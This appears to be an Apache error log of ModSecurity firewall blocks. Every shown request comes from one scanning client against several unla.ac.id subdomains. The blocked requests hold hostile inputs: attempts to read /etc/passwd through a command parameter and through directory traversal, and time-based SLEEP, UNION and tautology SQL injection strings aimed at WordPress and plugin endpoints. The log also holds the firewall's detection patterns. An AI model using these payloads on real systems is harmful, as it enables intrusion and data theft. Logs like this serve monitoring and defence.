[Tue Aug 29 11:35:32.333494 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAPDoToAAAAP"]
[Tue Aug 29 11:35:32.334751 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAATge@0AAAAl"]
[Tue Aug 29 11:35:32.334762 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAATOBBAAAAAH"]
[Tue Aug 29 11:35:32.335582 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAATQXksAAAAO"]
[Tue Aug 29 11:35:32.339626 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAVoCCMAAAAY"]
[Tue Aug 29 11:35:32.340523 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAUJI1sAAABB"]
[Tue Aug 29 11:35:32.341004 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAVPX5oAAAAF"]
[Tue Aug 29 11:35:32.361064 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAATWYVUAAAAa"]
[Tue Aug 29 11:35:33.309156 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAATQXkwAAAAO"]
[Tue Aug 29 11:35:33.312152 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAUR880AAABI"]
[Tue Aug 29 11:35:33.321008 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAATOBBEAAAAH"]
[Tue Aug 29 11:35:33.329542 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAPDoTsAAAAP"]
[Tue Aug 29 11:35:33.343355 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAATWYVcAAAAa"]
[Tue Aug 29 11:35:33.352675 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAVoCCUAAAAY"]
[Tue Aug 29 11:35:33.361746 2023] [:error] [pid 984] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAAPY1tQAAAAh"]
[Tue Aug 29 11:35:33.381514 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAASOUtEAAAAR"]
[Tue Aug 29 11:35:34.300780 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAASEJbUAAAAE"]
[Tue Aug 29 11:35:34.301104 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAVvlIoAAAAe"]
[Tue Aug 29 11:35:34.301460 2023] [:error] [pid 1402] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAV6LB8AAAAI"]
[Tue Aug 29 11:35:34.303169 2023] [:error] [pid 1384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAVoCCcAAAAY"]
[Tue Aug 29 11:35:34.315138 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAATWYVkAAAAa"]
[Tue Aug 29 11:35:34.319396 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAUKhDUAAABC"]
[Tue Aug 29 11:35:34.333636 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAUJI18AAABB"]
[Tue Aug 29 11:35:34.334162 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAVPX54AAAAF"]
[Tue Aug 29 11:35:34.343983 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAT9PSUAAAA1"]
[Tue Aug 29 11:35:34.347562 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAASI0HsAAAAG"]
[Tue Aug 29 11:35:34.366558 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAUOaYIAAABG"]
[Tue Aug 29 11:35:34.374163 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAVr@TYAAAAZ"]
[Tue Aug 29 11:35:34.376368 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAASOUtMAAAAR"]
